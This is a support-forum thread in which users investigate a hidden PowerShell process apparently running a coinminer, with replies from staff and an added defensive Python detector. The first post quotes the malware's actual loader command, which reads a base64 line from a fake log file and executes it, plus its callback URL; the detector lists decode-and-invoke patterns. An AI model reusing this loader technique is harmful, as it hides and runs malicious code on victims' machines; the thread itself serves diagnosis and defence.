Two strange powershell processes (maybe coinminers?)


Yesterday, I found some strange internet traffic while I was using Wireshark. Then I used the EIS "network connections" tool and found it was created by powershell (I didn't run any powershell). The issue reproduced today.

  1. Conhost.exe and powershell.exe were running in the background, but I didn't run either of them.
  2. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday); conhost doesn't seem to have any network activity.
  3. I used Wireshark to capture packets, then used the filter ipv6.addr==2606:4700:3031::ac43:9c07, and found it was using HTTP/1.1 with the CONNECT method. Please note the strange strings in X-User-Agent. By the way, the TLS (TCP 443) and QUIC (UDP 443) connections were created when I used sandboxed Firefox to visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL visiting them !!!); these websites use Cloudflare to protect themselves.
  4. I used ESET SysInspector to capture a snapshot.

I used nslookup to resolve:

C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1

DNS request timed out.
    timeout was 2 seconds.
*** 请求 UnKnown 超时

C:\Users\Admin>nslookup api.private-chatting.com
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1

非权威应答:
名称:    api.private-chatting.com
Addresses:  2606:4700:3032::6815:38d6
          2606:4700:3031::ac43:9c07
          104.21.56.214

__Today__

  1. I found the command-line parameters of one of the powershell.exe processes in taskmgr (it used about 10% CPU):

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer  n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

  2. Open C:\Windows\logs\system-logs.txt and find these strings:


Snipped: The code was moved to the attached file to squeeze the post.

 

Please note $EndPointURL = "hxxp://api.private-chatting.com/connect";

It's as same as the URL in pcapng file.

powershell command line in task manager.png

powershell.exe using internet.PNG

private-chatting.com.png

system-logs.txt Strange traffic_20220424.rar

system-logs.rar

Edited by Marcos
Script moved to an attached file
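A defender-side check for the loader the OP describes, added here as an example that is not code from the thread or from ESET: it scores a PowerShell command line for the read-one-line, base64-decode, Invoke-Command pattern, and scans a text file for base64 lines that decode to script text, which also covers itman's later point that the encoded file could be dropped anywhere. The command line is abridged from the one posted above; the encoded payload, the placeholder URL and the log lines are constructed.

```python
import base64
import binascii
import re

# Added example, not code from the thread: flags the loader pattern the OP found
# (powershell.exe reads one line of a "log" file, base64 decodes it and runs it via
# Invoke-Command) and scans any text file for lines that decode to script text.
LOADER_MARKERS = (
    re.compile(r"FromBase64String", re.I),
    re.compile(r"\[Scriptblock\]::Create", re.I),
    re.compile(r"Invoke-Command|Invoke-Expression|\biex\b", re.I),
    re.compile(r"Get-Content\s+\S+\s*\|\s*Select\s+-Index\s+\d+", re.I),
)
SCRIPT_HINTS = re.compile(r"\$\w+\s*=|Invoke-|New-Object|https?://", re.I)

def loader_score(cmdline: str) -> int:
    """Number of decode-and-invoke markers present in a command line."""
    return sum(1 for marker in LOADER_MARKERS if marker.search(cmdline))

def is_suspicious_cmdline(cmdline: str) -> bool:
    """Three or more markers together is the loader, not routine admin use."""
    return loader_score(cmdline) >= 3

def find_encoded_scripts(text: str, min_len: int = 40) -> list:
    """Return (line_no, decoded_text) for base64 lines that decode to script."""
    hits = []
    for line_no, line in enumerate(text.splitlines()):
        s = line.strip()
        if len(s) < min_len or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
            continue  # real log lines contain spaces and punctuation
        try:
            decoded = base64.b64decode(s, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if SCRIPT_HINTS.search(decoded):
            hits.append((line_no, decoded))
    return hits

# Constructed sample input: the OP's loader command line (abridged) and a fake log
# whose third line is a harmless stand-in for the encoded script (placeholder URL).
OP_CMDLINE = ('powershell.exe -NonInteractive -WindowStyle Hidden -Command &{'
              '$a=Get-Content C:\\Windows\\logs\\system-logs.txt | Select -Index 17033;'
              '$s=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a));'
              '$b=[Scriptblock]::Create($s);Invoke-Command $b}')
STANDIN = '$EndPointURL = "hxxp://placeholder.invalid/connect"; Invoke-RestMethod $EndPointURL'
SAMPLE_LOG = "\n".join(["2022-04-24 10:00:01 Service started",
                        "2022-04-24 10:00:02 Heartbeat ok",
                        base64.b64encode(STANDIN.encode()).decode(),
                        "2022-04-24 10:00:03 Heartbeat ok"])
```

Run `find_encoded_scripts` over the contents of any file a process reads shortly before a PowerShell launch; a hit in a file that is supposed to be a plain log is the indicator, whatever the file is named.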

Hi, I have the same process.

How do I remove it?

I tried disabling PowerShell, etc., but nothing.

I blocked the IP in the firewall; now the same thing with a new one.

How can I remove it, please???

Thanks.

 

I ran NOD32 but it found nothing.

2606:4700:3032::6815:38d6

[Attached screenshots: cmd.exe, ESET SysInspector, powershell.exe (PID 1540) Properties]


  • Administrators

You should find out the PowerShell script that was executed. Most likely it's legitimate which is also why it wasn't detected and there's no reason to be concerned.

Please provide logs collected with ESET Log Collector for a check.


47 minutes ago, ca81 said:

2606:4700:3032::6815:38d6

[Attached screenshots: cmd.exe, ESET SysInspector, powershell.exe (PID 1540) Properties]

Notice the remote IPv6 address is the same as previously posted that was detected performing coinmining activity.

Also, it is not normal Win system behavior to see PowerShell running as a stand-alone task for an extended period of time.

Edited by itman

In regard to the prior PowerShell code posted:

Eset_Coinminer.png

Attacker dropped the coinminer code file previously in the highlighted Windows log file directory. Attacker is creating an App-V process remotely using Sync-AppvPublishingServer.


I am going through the exact same thing, and if this is indeed malicious, what could be done to remove it? Could you possibly give a solution, please? Thank you!


  • Administrators
3 minutes ago, Soul said:

I am going through the exact same thing, and if this is indeed malicious, what could be done to remove it? Could you possibly give a solution, please? Thank you!

Please provide logs collected with ESET Log Collector for a start.


It is exactly the same stuff as above. Exact same IP addresses and the api.chatting thing. Exact same shell command that is causing powershell to run in the background. What itman posted is the shell command being executed.

Edited by Soul

  • Administrators

C:\Windows\logs\system-logs.txt should be detected. Please scan it with ESET. If not detected, supply it to me please.


Sorry, I'm a little confused. Which log file should I be giving you? I scanned the system_log file with ESET and it said it was fine.


Yeah, I could do that. Also, to add to this, I restarted my computer and ESET did block the script that was running, but I want more of a permanent solution if that's possible: to fully remove whatever is initiating that script to begin with.


  • Administrators
23 minutes ago, Soul said:

Yeah, I could do that. Also, to add to this, I restarted my computer and ESET did block the script that was running, but I want more of a permanent solution if that's possible: to fully remove whatever is initiating that script to begin with.

According to the logs provided you don't have ESET installed.

On the other hand, there's an install log from yesterday that reads:
(SERVER)     MSI (s) (80:C4) [22:51:31:369]: Product: ESET Security -- Installation completed successfully.
(SERVER)     MSI (s) (80:C4) [22:51:31:370]: Windows Installer installed the product. Product Name: ESET Security. Product Version: 15.1.12.0. Product Language: 1033. Manufacturer: ESET, spol. s r.o.. Installation success or error status: 0.

That said, it looks like ESET was uninstalled prior to collecting the logs.


I did, but I removed it because I wanted to see if the script it blocked was permanent or temporary, and I couldn't turn it off, so I uninstalled it and the script executed.


  • Administrators

You can upload it to a file sharing service, such as OneDrive, Dropbox, etc. and drop me a private message with a download link.


7 hours ago, Marcos said:

This is an actual log. Did you send a correct file?

Assume the file containing the Base64 encrypted coinminer code could be dropped anywhere. The attacker could actually now be creating a diversion where he is dropping two files; one being a legit system-logs.txt log file.

Also assume that since the file dropping is occurring prior to PowerShell execution, the coinminer code is being altered to defeat signature detection.

Appears to me a reverse shell has been created which is the source of the above activity. The key to stopping this coinminer is to find the reverse shell and create a sig. for it. Most likely for the attacker IP address being dialed out to.

My advice is create an Eset HIPS ask rule to monitor PowerShell.exe startup. Make sure alerting and log level of warning are specified. Hopefully this will point to what is running the script. Not sure here if the HIPS will detect the remote execution of the script. This HIPS ask rule should not cause issues for home users who would not be deploying PowerShell scripts for anything.

Edited by itman

I am also going to perform a "connecting of the dots" exercise here:

1. The PowerShell script is signed.

2. The IP addresses being used track to Cloudflare.

3. Incident reports to date are China, France, and the U.S.

4. The OP who started the thread stated a CPU usage spike of 10%; a low rate for coin miners.

5. PowerShell execution is not hidden in the least.

Putting it all together strongly points to a legit software install that is performing coin mining. Hell, even Norton AV is doing it currently: https://www.theverge.com/2022/1/7/22869528/norton-crypto-miner-security-software-reaction .

Edited by itman

Another thing I noticed from the OP's screenshot of running tasks is that he has VMware installed. The PowerShell script is loading the AppVClient. Finally, VMware has recent postings of RCE vulnerabilities: https://www.vmware.com/security/advisories/VMSA-2022-0010.html .

One of these RCE vulnerabilities is currently being exploited: https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html and PowerShell is part of the attack.

More details here:

Quote

Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation. Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons. With privileged access, these types of attacks may be able to bypass typical defenses including antivirus (AV) and endpoint detection and response (EDR). 

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor .

Edited by itman

  • Administrators

The OP has just installed ESET and it detected a PowerShell malware:

image.png

Since then I haven't heard if the threat has been resolved or not.


1 hour ago, Marcos said:

The OP has just installed ESET and it detected a PowerShell malware:

image.png

Since then I haven't heard if the threat has been resolved or not.

The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it was no longer detected after that.

Edited by Kevin999